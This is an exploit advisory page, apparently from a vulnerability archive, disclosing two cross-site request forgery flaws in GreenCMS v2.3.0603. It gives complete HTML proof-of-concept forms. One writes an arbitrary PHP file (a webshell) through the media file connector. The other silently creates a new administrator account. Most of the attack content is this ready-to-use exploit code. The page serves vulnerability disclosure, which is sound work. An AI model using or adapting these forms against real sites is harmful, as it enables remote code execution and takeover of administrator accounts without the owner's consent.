GreenCMS 2.3.0603 Cross Site Request Forgery

2018.06.04
Credit: xichao
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

Exploit 1 of 2: # Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability get webshell # Date: 2018-06-02 # Exploit Author: xichao # Vendor Homepage: https://github.com/GreenCMS/GreenCMS # Software Link: https://github.com/GreenCMS/GreenCMS # Version: v2.3.0603 # CVE : CVE-2018-11670 An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that allows attackers to execute arbitrary PHP code via the content parameter to index.php?m=admin&c=media&a=fileconnect. poc: <span style="font-size:18px;"><!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>csrftest</title> </head> <form action="http://127.0.0.1//14/index.php?m=admin&c=media&a=fileconnect" method="POST" id="transfer" name="transfer"> <script src="http://127.0.0.1/14/index.php?m=admin&c=media&a=fileconnect&cmd=mkfile&name=xc.php&target=l1_XA&_=1527839615462"></script> <input type="hidden" name="cmd" value="put"> <input type="hidden" name="target" value="l1_eGMucGhw"> a <input type="hidden" name="content" value="<?php phpinfo();?>"> <button type="submit" value="Submit">WebShell</button> </form> </body> </html></span> References: http://www.iwantacve.cn/index.php/archives/38/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11670 https://github.com/GreenCMS/GreenCMS/issues/108 ---------------- Exploit 2 of 2: # Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability add admin # Date: 2018-06-02 # Exploit Author: xichao # Vendor Homepage: https://github.com/GreenCMS/GreenCMS # Software Link: https://github.com/GreenCMS/GreenCMS # Version: v2.3.0603 # CVE : CVE-2018-11671 An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that can add an admin account via index.php?m=admin&c=access&a=adduserhandle. poc: <span style="font-size:18px;"><!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>csrftest</title> </head> aa<body> aaaa<form action="http://127.0.0.1//14/index.php?m=admin&c=access&a=adduserhandle" method="POST" id="transfer" name="transfer"> aaaaaaaa<input type="hidden" name="user_id0" value="1"> aaaaaaaa<input type="hidden" name="user_login" value="test1"> aaaaaaaa<input type="hidden" name="password" value="test1"> aaaaaaaa<input type="hidden" name="rpassword" value="test1"> aaaaaaaa<input type="hidden" name="user_nicename" value="123"> aaaaaaaa<input type="hidden" name="user_email" value="123%40Qq.com"> aaaaaaaa<input type="hidden" name="user_url" value="www.baidu.com"> aaaaaaaa<input type="hidden" name="user_intro" value="test"> aaaaaaaa<input type="hidden" name="user_status" value="1"> aaaaaaaa<input type="hidden" name="role_id" value="1"> <button type="submit" value="Submit">add admin</button> aaaaaa</form> </body> </html></span> References: http://www.iwantacve.cn/index.php/archives/39/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11671 https://github.com/GreenCMS/GreenCMS/issues/109


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top